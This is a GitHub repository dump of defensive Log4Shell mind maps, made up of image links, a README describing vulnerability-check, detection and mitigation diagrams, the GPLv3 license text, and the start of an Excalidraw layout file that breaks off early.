├── Log4shell
│   ├── v2-detectLog4shell.png
│   ├── Shield-Log4shell-v1.png
│   ├── AmIVulnerable-Log4shell-v6.0.png
│   ├── AmIVulnerable-Log4shell-v6.1.png
│   └── Shield-Log4shell-v1.excalidraw
├── README.md
└── LICENSE
/Log4shell/v2-detectLog4shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DickReverse/InfosecMindmaps/HEAD/Log4shell/v2-detectLog4shell.png
--------------------------------------------------------------------------------
/Log4shell/Shield-Log4shell-v1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DickReverse/InfosecMindmaps/HEAD/Log4shell/Shield-Log4shell-v1.png
--------------------------------------------------------------------------------
/Log4shell/AmIVulnerable-Log4shell-v6.0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DickReverse/InfosecMindmaps/HEAD/Log4shell/AmIVulnerable-Log4shell-v6.0.png
--------------------------------------------------------------------------------
/Log4shell/AmIVulnerable-Log4shell-v6.1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DickReverse/InfosecMindmaps/HEAD/Log4shell/AmIVulnerable-Log4shell-v6.1.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # InfosecMindmaps
2 |
3 | ## Log4Shell
4 | Three mind maps designed to help mitigate and protect against the Log4shell vulnerability (lots of CVEs now...):
5 | * Mind map #1: Decision tree to identify whether the code in use is vulnerable
6 | * Mind map #2: How to detect the vulnerability, from a black-box or white-box perspective
7 | * Mind map #3: Shielding and mitigations against Log4shell. Patching is one thing, but defence in depth is advised; a few pointers in this mind map can help.
8 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | GNU GENERAL PUBLIC LICENSE
2 | Version 3, 29 June 2007
3 |
4 | Copyright (C) 2007 Free Software Foundation, Inc.
5 | Everyone is permitted to copy and distribute verbatim copies
6 | of this license document, but changing it is not allowed.
7 |
8 | Preamble
9 |
10 | The GNU General Public License is a free, copyleft license for
11 | software and other kinds of works.
12 |
13 | The licenses for most software and other practical works are designed
14 | to take away your freedom to share and change the works. By contrast,
15 | the GNU General Public License is intended to guarantee your freedom to
16 | share and change all versions of a program--to make sure it remains free
17 | software for all its users. We, the Free Software Foundation, use the
18 | GNU General Public License for most of our software; it applies also to
19 | any other work released this way by its authors. You can apply it to
20 | your programs, too.
21 |
22 | When we speak of free software, we are referring to freedom, not
23 | price. Our General Public Licenses are designed to make sure that you
24 | have the freedom to distribute copies of free software (and charge for
25 | them if you wish), that you receive source code or can get it if you
26 | want it, that you can change the software or use pieces of it in new
27 | free programs, and that you know you can do these things.
28 |
29 | To protect your rights, we need to prevent others from denying you
30 | these rights or asking you to surrender the rights. Therefore, you have
31 | certain responsibilities if you distribute copies of the software, or if
32 | you modify it: responsibilities to respect the freedom of others.
33 |
34 | For example, if you distribute copies of such a program, whether
35 | gratis or for a fee, you must pass on to the recipients the same
36 | freedoms that you received. You must make sure that they, too, receive
37 | or can get the source code. And you must show them these terms so they
38 | know their rights.
39 |
40 | Developers that use the GNU GPL protect your rights with two steps:
41 | (1) assert copyright on the software, and (2) offer you this License
42 | giving you legal permission to copy, distribute and/or modify it.
43 |
44 | For the developers' and authors' protection, the GPL clearly explains
45 | that there is no warranty for this free software. For both users' and
46 | authors' sake, the GPL requires that modified versions be marked as
47 | changed, so that their problems will not be attributed erroneously to
48 | authors of previous versions.
49 |
50 | Some devices are designed to deny users access to install or run
51 | modified versions of the software inside them, although the manufacturer
52 | can do so. This is fundamentally incompatible with the aim of
53 | protecting users' freedom to change the software. The systematic
54 | pattern of such abuse occurs in the area of products for individuals to
55 | use, which is precisely where it is most unacceptable. Therefore, we
56 | have designed this version of the GPL to prohibit the practice for those
57 | products. If such problems arise substantially in other domains, we
58 | stand ready to extend this provision to those domains in future versions
59 | of the GPL, as needed to protect the freedom of users.
60 |
61 | Finally, every program is threatened constantly by software patents.
62 | States should not allow patents to restrict development and use of
63 | software on general-purpose computers, but in those that do, we wish to
64 | avoid the special danger that patents applied to a free program could
65 | make it effectively proprietary. To prevent this, the GPL assures that
66 | patents cannot be used to render the program non-free.
67 |
68 | The precise terms and conditions for copying, distribution and
69 | modification follow.
70 |
71 | TERMS AND CONDITIONS
72 |
73 | 0. Definitions.
74 |
75 | "This License" refers to version 3 of the GNU General Public License.
76 |
77 | "Copyright" also means copyright-like laws that apply to other kinds of
78 | works, such as semiconductor masks.
79 |
80 | "The Program" refers to any copyrightable work licensed under this
81 | License. Each licensee is addressed as "you". "Licensees" and
82 | "recipients" may be individuals or organizations.
83 |
84 | To "modify" a work means to copy from or adapt all or part of the work
85 | in a fashion requiring copyright permission, other than the making of an
86 | exact copy. The resulting work is called a "modified version" of the
87 | earlier work or a work "based on" the earlier work.
88 |
89 | A "covered work" means either the unmodified Program or a work based
90 | on the Program.
91 |
92 | To "propagate" a work means to do anything with it that, without
93 | permission, would make you directly or secondarily liable for
94 | infringement under applicable copyright law, except executing it on a
95 | computer or modifying a private copy. Propagation includes copying,
96 | distribution (with or without modification), making available to the
97 | public, and in some countries other activities as well.
98 |
99 | To "convey" a work means any kind of propagation that enables other
100 | parties to make or receive copies. Mere interaction with a user through
101 | a computer network, with no transfer of a copy, is not conveying.
102 |
103 | An interactive user interface displays "Appropriate Legal Notices"
104 | to the extent that it includes a convenient and prominently visible
105 | feature that (1) displays an appropriate copyright notice, and (2)
106 | tells the user that there is no warranty for the work (except to the
107 | extent that warranties are provided), that licensees may convey the
108 | work under this License, and how to view a copy of this License. If
109 | the interface presents a list of user commands or options, such as a
110 | menu, a prominent item in the list meets this criterion.
111 |
112 | 1. Source Code.
113 |
114 | The "source code" for a work means the preferred form of the work
115 | for making modifications to it. "Object code" means any non-source
116 | form of a work.
117 |
118 | A "Standard Interface" means an interface that either is an official
119 | standard defined by a recognized standards body, or, in the case of
120 | interfaces specified for a particular programming language, one that
121 | is widely used among developers working in that language.
122 |
123 | The "System Libraries" of an executable work include anything, other
124 | than the work as a whole, that (a) is included in the normal form of
125 | packaging a Major Component, but which is not part of that Major
126 | Component, and (b) serves only to enable use of the work with that
127 | Major Component, or to implement a Standard Interface for which an
128 | implementation is available to the public in source code form. A
129 | "Major Component", in this context, means a major essential component
130 | (kernel, window system, and so on) of the specific operating system
131 | (if any) on which the executable work runs, or a compiler used to
132 | produce the work, or an object code interpreter used to run it.
133 |
134 | The "Corresponding Source" for a work in object code form means all
135 | the source code needed to generate, install, and (for an executable
136 | work) run the object code and to modify the work, including scripts to
137 | control those activities. However, it does not include the work's
138 | System Libraries, or general-purpose tools or generally available free
139 | programs which are used unmodified in performing those activities but
140 | which are not part of the work. For example, Corresponding Source
141 | includes interface definition files associated with source files for
142 | the work, and the source code for shared libraries and dynamically
143 | linked subprograms that the work is specifically designed to require,
144 | such as by intimate data communication or control flow between those
145 | subprograms and other parts of the work.
146 |
147 | The Corresponding Source need not include anything that users
148 | can regenerate automatically from other parts of the Corresponding
149 | Source.
150 |
151 | The Corresponding Source for a work in source code form is that
152 | same work.
153 |
154 | 2. Basic Permissions.
155 |
156 | All rights granted under this License are granted for the term of
157 | copyright on the Program, and are irrevocable provided the stated
158 | conditions are met. This License explicitly affirms your unlimited
159 | permission to run the unmodified Program. The output from running a
160 | covered work is covered by this License only if the output, given its
161 | content, constitutes a covered work. This License acknowledges your
162 | rights of fair use or other equivalent, as provided by copyright law.
163 |
164 | You may make, run and propagate covered works that you do not
165 | convey, without conditions so long as your license otherwise remains
166 | in force. You may convey covered works to others for the sole purpose
167 | of having them make modifications exclusively for you, or provide you
168 | with facilities for running those works, provided that you comply with
169 | the terms of this License in conveying all material for which you do
170 | not control copyright. Those thus making or running the covered works
171 | for you must do so exclusively on your behalf, under your direction
172 | and control, on terms that prohibit them from making any copies of
173 | your copyrighted material outside their relationship with you.
174 |
175 | Conveying under any other circumstances is permitted solely under
176 | the conditions stated below. Sublicensing is not allowed; section 10
177 | makes it unnecessary.
178 |
179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law.
180 |
181 | No covered work shall be deemed part of an effective technological
182 | measure under any applicable law fulfilling obligations under article
183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or
184 | similar laws prohibiting or restricting circumvention of such
185 | measures.
186 |
187 | When you convey a covered work, you waive any legal power to forbid
188 | circumvention of technological measures to the extent such circumvention
189 | is effected by exercising rights under this License with respect to
190 | the covered work, and you disclaim any intention to limit operation or
191 | modification of the work as a means of enforcing, against the work's
192 | users, your or third parties' legal rights to forbid circumvention of
193 | technological measures.
194 |
195 | 4. Conveying Verbatim Copies.
196 |
197 | You may convey verbatim copies of the Program's source code as you
198 | receive it, in any medium, provided that you conspicuously and
199 | appropriately publish on each copy an appropriate copyright notice;
200 | keep intact all notices stating that this License and any
201 | non-permissive terms added in accord with section 7 apply to the code;
202 | keep intact all notices of the absence of any warranty; and give all
203 | recipients a copy of this License along with the Program.
204 |
205 | You may charge any price or no price for each copy that you convey,
206 | and you may offer support or warranty protection for a fee.
207 |
208 | 5. Conveying Modified Source Versions.
209 |
210 | You may convey a work based on the Program, or the modifications to
211 | produce it from the Program, in the form of source code under the
212 | terms of section 4, provided that you also meet all of these conditions:
213 |
214 | a) The work must carry prominent notices stating that you modified
215 | it, and giving a relevant date.
216 |
217 | b) The work must carry prominent notices stating that it is
218 | released under this License and any conditions added under section
219 | 7. This requirement modifies the requirement in section 4 to
220 | "keep intact all notices".
221 |
222 | c) You must license the entire work, as a whole, under this
223 | License to anyone who comes into possession of a copy. This
224 | License will therefore apply, along with any applicable section 7
225 | additional terms, to the whole of the work, and all its parts,
226 | regardless of how they are packaged. This License gives no
227 | permission to license the work in any other way, but it does not
228 | invalidate such permission if you have separately received it.
229 |
230 | d) If the work has interactive user interfaces, each must display
231 | Appropriate Legal Notices; however, if the Program has interactive
232 | interfaces that do not display Appropriate Legal Notices, your
233 | work need not make them do so.
234 |
235 | A compilation of a covered work with other separate and independent
236 | works, which are not by their nature extensions of the covered work,
237 | and which are not combined with it such as to form a larger program,
238 | in or on a volume of a storage or distribution medium, is called an
239 | "aggregate" if the compilation and its resulting copyright are not
240 | used to limit the access or legal rights of the compilation's users
241 | beyond what the individual works permit. Inclusion of a covered work
242 | in an aggregate does not cause this License to apply to the other
243 | parts of the aggregate.
244 |
245 | 6. Conveying Non-Source Forms.
246 |
247 | You may convey a covered work in object code form under the terms
248 | of sections 4 and 5, provided that you also convey the
249 | machine-readable Corresponding Source under the terms of this License,
250 | in one of these ways:
251 |
252 | a) Convey the object code in, or embodied in, a physical product
253 | (including a physical distribution medium), accompanied by the
254 | Corresponding Source fixed on a durable physical medium
255 | customarily used for software interchange.
256 |
257 | b) Convey the object code in, or embodied in, a physical product
258 | (including a physical distribution medium), accompanied by a
259 | written offer, valid for at least three years and valid for as
260 | long as you offer spare parts or customer support for that product
261 | model, to give anyone who possesses the object code either (1) a
262 | copy of the Corresponding Source for all the software in the
263 | product that is covered by this License, on a durable physical
264 | medium customarily used for software interchange, for a price no
265 | more than your reasonable cost of physically performing this
266 | conveying of source, or (2) access to copy the
267 | Corresponding Source from a network server at no charge.
268 |
269 | c) Convey individual copies of the object code with a copy of the
270 | written offer to provide the Corresponding Source. This
271 | alternative is allowed only occasionally and noncommercially, and
272 | only if you received the object code with such an offer, in accord
273 | with subsection 6b.
274 |
275 | d) Convey the object code by offering access from a designated
276 | place (gratis or for a charge), and offer equivalent access to the
277 | Corresponding Source in the same way through the same place at no
278 | further charge. You need not require recipients to copy the
279 | Corresponding Source along with the object code. If the place to
280 | copy the object code is a network server, the Corresponding Source
281 | may be on a different server (operated by you or a third party)
282 | that supports equivalent copying facilities, provided you maintain
283 | clear directions next to the object code saying where to find the
284 | Corresponding Source. Regardless of what server hosts the
285 | Corresponding Source, you remain obligated to ensure that it is
286 | available for as long as needed to satisfy these requirements.
287 |
288 | e) Convey the object code using peer-to-peer transmission, provided
289 | you inform other peers where the object code and Corresponding
290 | Source of the work are being offered to the general public at no
291 | charge under subsection 6d.
292 |
293 | A separable portion of the object code, whose source code is excluded
294 | from the Corresponding Source as a System Library, need not be
295 | included in conveying the object code work.
296 |
297 | A "User Product" is either (1) a "consumer product", which means any
298 | tangible personal property which is normally used for personal, family,
299 | or household purposes, or (2) anything designed or sold for incorporation
300 | into a dwelling. In determining whether a product is a consumer product,
301 | doubtful cases shall be resolved in favor of coverage. For a particular
302 | product received by a particular user, "normally used" refers to a
303 | typical or common use of that class of product, regardless of the status
304 | of the particular user or of the way in which the particular user
305 | actually uses, or expects or is expected to use, the product. A product
306 | is a consumer product regardless of whether the product has substantial
307 | commercial, industrial or non-consumer uses, unless such uses represent
308 | the only significant mode of use of the product.
309 |
310 | "Installation Information" for a User Product means any methods,
311 | procedures, authorization keys, or other information required to install
312 | and execute modified versions of a covered work in that User Product from
313 | a modified version of its Corresponding Source. The information must
314 | suffice to ensure that the continued functioning of the modified object
315 | code is in no case prevented or interfered with solely because
316 | modification has been made.
317 |
318 | If you convey an object code work under this section in, or with, or
319 | specifically for use in, a User Product, and the conveying occurs as
320 | part of a transaction in which the right of possession and use of the
321 | User Product is transferred to the recipient in perpetuity or for a
322 | fixed term (regardless of how the transaction is characterized), the
323 | Corresponding Source conveyed under this section must be accompanied
324 | by the Installation Information. But this requirement does not apply
325 | if neither you nor any third party retains the ability to install
326 | modified object code on the User Product (for example, the work has
327 | been installed in ROM).
328 |
329 | The requirement to provide Installation Information does not include a
330 | requirement to continue to provide support service, warranty, or updates
331 | for a work that has been modified or installed by the recipient, or for
332 | the User Product in which it has been modified or installed. Access to a
333 | network may be denied when the modification itself materially and
334 | adversely affects the operation of the network or violates the rules and
335 | protocols for communication across the network.
336 |
337 | Corresponding Source conveyed, and Installation Information provided,
338 | in accord with this section must be in a format that is publicly
339 | documented (and with an implementation available to the public in
340 | source code form), and must require no special password or key for
341 | unpacking, reading or copying.
342 |
343 | 7. Additional Terms.
344 |
345 | "Additional permissions" are terms that supplement the terms of this
346 | License by making exceptions from one or more of its conditions.
347 | Additional permissions that are applicable to the entire Program shall
348 | be treated as though they were included in this License, to the extent
349 | that they are valid under applicable law. If additional permissions
350 | apply only to part of the Program, that part may be used separately
351 | under those permissions, but the entire Program remains governed by
352 | this License without regard to the additional permissions.
353 |
354 | When you convey a copy of a covered work, you may at your option
355 | remove any additional permissions from that copy, or from any part of
356 | it. (Additional permissions may be written to require their own
357 | removal in certain cases when you modify the work.) You may place
358 | additional permissions on material, added by you to a covered work,
359 | for which you have or can give appropriate copyright permission.
360 |
361 | Notwithstanding any other provision of this License, for material you
362 | add to a covered work, you may (if authorized by the copyright holders of
363 | that material) supplement the terms of this License with terms:
364 |
365 | a) Disclaiming warranty or limiting liability differently from the
366 | terms of sections 15 and 16 of this License; or
367 |
368 | b) Requiring preservation of specified reasonable legal notices or
369 | author attributions in that material or in the Appropriate Legal
370 | Notices displayed by works containing it; or
371 |
372 | c) Prohibiting misrepresentation of the origin of that material, or
373 | requiring that modified versions of such material be marked in
374 | reasonable ways as different from the original version; or
375 |
376 | d) Limiting the use for publicity purposes of names of licensors or
377 | authors of the material; or
378 |
379 | e) Declining to grant rights under trademark law for use of some
380 | trade names, trademarks, or service marks; or
381 |
382 | f) Requiring indemnification of licensors and authors of that
383 | material by anyone who conveys the material (or modified versions of
384 | it) with contractual assumptions of liability to the recipient, for
385 | any liability that these contractual assumptions directly impose on
386 | those licensors and authors.
387 |
388 | All other non-permissive additional terms are considered "further
389 | restrictions" within the meaning of section 10. If the Program as you
390 | received it, or any part of it, contains a notice stating that it is
391 | governed by this License along with a term that is a further
392 | restriction, you may remove that term. If a license document contains
393 | a further restriction but permits relicensing or conveying under this
394 | License, you may add to a covered work material governed by the terms
395 | of that license document, provided that the further restriction does
396 | not survive such relicensing or conveying.
397 |
398 | If you add terms to a covered work in accord with this section, you
399 | must place, in the relevant source files, a statement of the
400 | additional terms that apply to those files, or a notice indicating
401 | where to find the applicable terms.
402 |
403 | Additional terms, permissive or non-permissive, may be stated in the
404 | form of a separately written license, or stated as exceptions;
405 | the above requirements apply either way.
406 |
407 | 8. Termination.
408 |
409 | You may not propagate or modify a covered work except as expressly
410 | provided under this License. Any attempt otherwise to propagate or
411 | modify it is void, and will automatically terminate your rights under
412 | this License (including any patent licenses granted under the third
413 | paragraph of section 11).
414 |
415 | However, if you cease all violation of this License, then your
416 | license from a particular copyright holder is reinstated (a)
417 | provisionally, unless and until the copyright holder explicitly and
418 | finally terminates your license, and (b) permanently, if the copyright
419 | holder fails to notify you of the violation by some reasonable means
420 | prior to 60 days after the cessation.
421 |
422 | Moreover, your license from a particular copyright holder is
423 | reinstated permanently if the copyright holder notifies you of the
424 | violation by some reasonable means, this is the first time you have
425 | received notice of violation of this License (for any work) from that
426 | copyright holder, and you cure the violation prior to 30 days after
427 | your receipt of the notice.
428 |
429 | Termination of your rights under this section does not terminate the
430 | licenses of parties who have received copies or rights from you under
431 | this License. If your rights have been terminated and not permanently
432 | reinstated, you do not qualify to receive new licenses for the same
433 | material under section 10.
434 |
435 | 9. Acceptance Not Required for Having Copies.
436 |
437 | You are not required to accept this License in order to receive or
438 | run a copy of the Program. Ancillary propagation of a covered work
439 | occurring solely as a consequence of using peer-to-peer transmission
440 | to receive a copy likewise does not require acceptance. However,
441 | nothing other than this License grants you permission to propagate or
442 | modify any covered work. These actions infringe copyright if you do
443 | not accept this License. Therefore, by modifying or propagating a
444 | covered work, you indicate your acceptance of this License to do so.
445 |
446 | 10. Automatic Licensing of Downstream Recipients.
447 |
448 | Each time you convey a covered work, the recipient automatically
449 | receives a license from the original licensors, to run, modify and
450 | propagate that work, subject to this License. You are not responsible
451 | for enforcing compliance by third parties with this License.
452 |
453 | An "entity transaction" is a transaction transferring control of an
454 | organization, or substantially all assets of one, or subdividing an
455 | organization, or merging organizations. If propagation of a covered
456 | work results from an entity transaction, each party to that
457 | transaction who receives a copy of the work also receives whatever
458 | licenses to the work the party's predecessor in interest had or could
459 | give under the previous paragraph, plus a right to possession of the
460 | Corresponding Source of the work from the predecessor in interest, if
461 | the predecessor has it or can get it with reasonable efforts.
462 |
463 | You may not impose any further restrictions on the exercise of the
464 | rights granted or affirmed under this License. For example, you may
465 | not impose a license fee, royalty, or other charge for exercise of
466 | rights granted under this License, and you may not initiate litigation
467 | (including a cross-claim or counterclaim in a lawsuit) alleging that
468 | any patent claim is infringed by making, using, selling, offering for
469 | sale, or importing the Program or any portion of it.
470 |
471 | 11. Patents.
472 |
473 | A "contributor" is a copyright holder who authorizes use under this
474 | License of the Program or a work on which the Program is based. The
475 | work thus licensed is called the contributor's "contributor version".
476 |
477 | A contributor's "essential patent claims" are all patent claims
478 | owned or controlled by the contributor, whether already acquired or
479 | hereafter acquired, that would be infringed by some manner, permitted
480 | by this License, of making, using, or selling its contributor version,
481 | but do not include claims that would be infringed only as a
482 | consequence of further modification of the contributor version. For
483 | purposes of this definition, "control" includes the right to grant
484 | patent sublicenses in a manner consistent with the requirements of
485 | this License.
486 |
487 | Each contributor grants you a non-exclusive, worldwide, royalty-free
488 | patent license under the contributor's essential patent claims, to
489 | make, use, sell, offer for sale, import and otherwise run, modify and
490 | propagate the contents of its contributor version.
491 |
492 | In the following three paragraphs, a "patent license" is any express
493 | agreement or commitment, however denominated, not to enforce a patent
494 | (such as an express permission to practice a patent or covenant not to
495 | sue for patent infringement). To "grant" such a patent license to a
496 | party means to make such an agreement or commitment not to enforce a
497 | patent against the party.
498 |
499 | If you convey a covered work, knowingly relying on a patent license,
500 | and the Corresponding Source of the work is not available for anyone
501 | to copy, free of charge and under the terms of this License, through a
502 | publicly available network server or other readily accessible means,
503 | then you must either (1) cause the Corresponding Source to be so
504 | available, or (2) arrange to deprive yourself of the benefit of the
505 | patent license for this particular work, or (3) arrange, in a manner
506 | consistent with the requirements of this License, to extend the patent
507 | license to downstream recipients. "Knowingly relying" means you have
508 | actual knowledge that, but for the patent license, your conveying the
509 | covered work in a country, or your recipient's use of the covered work
510 | in a country, would infringe one or more identifiable patents in that
511 | country that you have reason to believe are valid.
512 |
513 | If, pursuant to or in connection with a single transaction or
514 | arrangement, you convey, or propagate by procuring conveyance of, a
515 | covered work, and grant a patent license to some of the parties
516 | receiving the covered work authorizing them to use, propagate, modify
517 | or convey a specific copy of the covered work, then the patent license
518 | you grant is automatically extended to all recipients of the covered
519 | work and works based on it.
520 |
521 | A patent license is "discriminatory" if it does not include within
522 | the scope of its coverage, prohibits the exercise of, or is
523 | conditioned on the non-exercise of one or more of the rights that are
524 | specifically granted under this License. You may not convey a covered
525 | work if you are a party to an arrangement with a third party that is
526 | in the business of distributing software, under which you make payment
527 | to the third party based on the extent of your activity of conveying
528 | the work, and under which the third party grants, to any of the
529 | parties who would receive the covered work from you, a discriminatory
530 | patent license (a) in connection with copies of the covered work
531 | conveyed by you (or copies made from those copies), or (b) primarily
532 | for and in connection with specific products or compilations that
533 | contain the covered work, unless you entered into that arrangement,
534 | or that patent license was granted, prior to 28 March 2007.
535 |
536 | Nothing in this License shall be construed as excluding or limiting
537 | any implied license or other defenses to infringement that may
538 | otherwise be available to you under applicable patent law.
539 |
540 | 12. No Surrender of Others' Freedom.
541 |
542 | If conditions are imposed on you (whether by court order, agreement or
543 | otherwise) that contradict the conditions of this License, they do not
544 | excuse you from the conditions of this License. If you cannot convey a
545 | covered work so as to satisfy simultaneously your obligations under this
546 | License and any other pertinent obligations, then as a consequence you may
547 | not convey it at all. For example, if you agree to terms that obligate you
548 | to collect a royalty for further conveying from those to whom you convey
549 | the Program, the only way you could satisfy both those terms and this
550 | License would be to refrain entirely from conveying the Program.
551 |
552 | 13. Use with the GNU Affero General Public License.
553 |
554 | Notwithstanding any other provision of this License, you have
555 | permission to link or combine any covered work with a work licensed
556 | under version 3 of the GNU Affero General Public License into a single
557 | combined work, and to convey the resulting work. The terms of this
558 | License will continue to apply to the part which is the covered work,
559 | but the special requirements of the GNU Affero General Public License,
560 | section 13, concerning interaction through a network will apply to the
561 | combination as such.
562 |
563 | 14. Revised Versions of this License.
564 |
565 | The Free Software Foundation may publish revised and/or new versions of
566 | the GNU General Public License from time to time. Such new versions will
567 | be similar in spirit to the present version, but may differ in detail to
568 | address new problems or concerns.
569 |
570 | Each version is given a distinguishing version number. If the
571 | Program specifies that a certain numbered version of the GNU General
572 | Public License "or any later version" applies to it, you have the
573 | option of following the terms and conditions either of that numbered
574 | version or of any later version published by the Free Software
575 | Foundation. If the Program does not specify a version number of the
576 | GNU General Public License, you may choose any version ever published
577 | by the Free Software Foundation.
578 |
579 | If the Program specifies that a proxy can decide which future
580 | versions of the GNU General Public License can be used, that proxy's
581 | public statement of acceptance of a version permanently authorizes you
582 | to choose that version for the Program.
583 |
584 | Later license versions may give you additional or different
585 | permissions. However, no additional obligations are imposed on any
586 | author or copyright holder as a result of your choosing to follow a
587 | later version.
588 |
589 | 15. Disclaimer of Warranty.
590 |
591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
599 |
600 | 16. Limitation of Liability.
601 |
602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
610 | SUCH DAMAGES.
611 |
612 | 17. Interpretation of Sections 15 and 16.
613 |
614 | If the disclaimer of warranty and limitation of liability provided
615 | above cannot be given local legal effect according to their terms,
616 | reviewing courts shall apply local law that most closely approximates
617 | an absolute waiver of all civil liability in connection with the
618 | Program, unless a warranty or assumption of liability accompanies a
619 | copy of the Program in return for a fee.
620 |
621 | END OF TERMS AND CONDITIONS
622 |
623 | How to Apply These Terms to Your New Programs
624 |
625 | If you develop a new program, and you want it to be of the greatest
626 | possible use to the public, the best way to achieve this is to make it
627 | free software which everyone can redistribute and change under these terms.
628 |
629 | To do so, attach the following notices to the program. It is safest
630 | to attach them to the start of each source file to most effectively
631 | state the exclusion of warranty; and each file should have at least
632 | the "copyright" line and a pointer to where the full notice is found.
633 |
634 |
635 | Copyright (C)
636 |
637 | This program is free software: you can redistribute it and/or modify
638 | it under the terms of the GNU General Public License as published by
639 | the Free Software Foundation, either version 3 of the License, or
640 | (at your option) any later version.
641 |
642 | This program is distributed in the hope that it will be useful,
643 | but WITHOUT ANY WARRANTY; without even the implied warranty of
644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
645 | GNU General Public License for more details.
646 |
647 | You should have received a copy of the GNU General Public License
648 | along with this program. If not, see .
649 |
650 | Also add information on how to contact you by electronic and paper mail.
651 |
652 | If the program does terminal interaction, make it output a short
653 | notice like this when it starts in an interactive mode:
654 |
655 | Copyright (C)
656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
657 | This is free software, and you are welcome to redistribute it
658 | under certain conditions; type `show c' for details.
659 |
660 | The hypothetical commands `show w' and `show c' should show the appropriate
661 | parts of the General Public License. Of course, your program's commands
662 | might be different; for a GUI interface, you would use an "about box".
663 |
664 | You should also get your employer (if you work as a programmer) or school,
665 | if any, to sign a "copyright disclaimer" for the program, if necessary.
666 | For more information on this, and how to apply and follow the GNU GPL, see
667 | .
668 |
669 | The GNU General Public License does not permit incorporating your program
670 | into proprietary programs. If your program is a subroutine library, you
671 | may consider it more useful to permit linking proprietary applications with
672 | the library. If this is what you want to do, use the GNU Lesser General
673 | Public License instead of this License. But first, please read
674 | .
675 |
--------------------------------------------------------------------------------
/Log4shell/Shield-Log4shell-v1.excalidraw:
--------------------------------------------------------------------------------
1 | {
2 | "type": "excalidraw",
3 | "version": 2,
4 | "source": "https://excalidraw.com",
5 | "elements": [
6 | {
7 | "type": "text",
8 | "version": 316,
9 | "versionNonce": 1476859968,
10 | "isDeleted": false,
11 | "id": "Qlt3GHub2Fwr_knSTgdNo",
12 | "fillStyle": "hachure",
13 | "strokeWidth": 1,
14 | "strokeStyle": "solid",
15 | "roughness": 1,
16 | "opacity": 100,
17 | "angle": 0,
18 | "x": 694.5,
19 | "y": -5.5,
20 | "strokeColor": "#000000",
21 | "backgroundColor": "transparent",
22 | "width": 721,
23 | "height": 90,
24 | "seed": 889676736,
25 | "groupIds": [],
26 | "strokeSharpness": "sharp",
27 | "boundElements": [],
28 | "updated": 1639775213769,
29 | "fontSize": 36,
30 | "fontFamily": 1,
31 | "text": "Mind map #3\nShielding & Mitigations against Log4Shell",
32 | "baseline": 77,
33 | "textAlign": "center",
34 | "verticalAlign": "top",
35 | "containerId": null,
36 | "originalText": "Mind map #3\nShielding & Mitigations against Log4Shell"
37 | },
38 | {
39 | "id": "GpZQY-DHAbv0YkTmZPMOF",
40 | "type": "line",
41 | "x": 124.84205706032567,
42 | "y": 550.219751102027,
43 | "width": 2013.4076462251487,
44 | "height": 2.559958863604766,
45 | "angle": 0,
46 | "strokeColor": "#000000",
47 | "backgroundColor": "transparent",
48 | "fillStyle": "hachure",
49 | "strokeWidth": 1,
50 | "strokeStyle": "dashed",
51 | "roughness": 1,
52 | "opacity": 100,
53 | "groupIds": [],
54 | "strokeSharpness": "round",
55 | "seed": 1897834560,
56 | "version": 238,
57 | "versionNonce": 1640336320,
58 | "isDeleted": false,
59 | "boundElements": null,
60 | "updated": 1639775213769,
61 | "points": [
62 | [
63 | 0,
64 | 0
65 | ],
66 | [
67 | 2013.4076462251487,
68 | 2.559958863604766
69 | ]
70 | ],
71 | "lastCommittedPoint": null,
72 | "startBinding": null,
73 | "endBinding": null,
74 | "startArrowhead": null,
75 | "endArrowhead": null
76 | },
77 | {
78 | "id": "oUwz5wTwsfW78wHnB0bQA",
79 | "type": "text",
80 | "x": 122.42987659081422,
81 | "y": 475.9638501089124,
82 | "width": 445.4328422672292,
83 | "height": 63.99897159011915,
84 | "angle": 0,
85 | "strokeColor": "#c92a2a",
86 | "backgroundColor": "transparent",
87 | "fillStyle": "hachure",
88 | "strokeWidth": 1,
89 | "strokeStyle": "dashed",
90 | "roughness": 1,
91 | "opacity": 100,
92 | "groupIds": [],
93 | "strokeSharpness": "sharp",
94 | "seed": 398760896,
95 | "version": 202,
96 | "versionNonce": 804917312,
97 | "isDeleted": false,
98 | "boundElements": null,
99 | "updated": 1639775213769,
100 | "text": "First line of defense\nBlock / prevent before exploitation",
101 | "fontSize": 25.599588636047667,
102 | "fontFamily": 1,
103 | "textAlign": "left",
104 | "verticalAlign": "top",
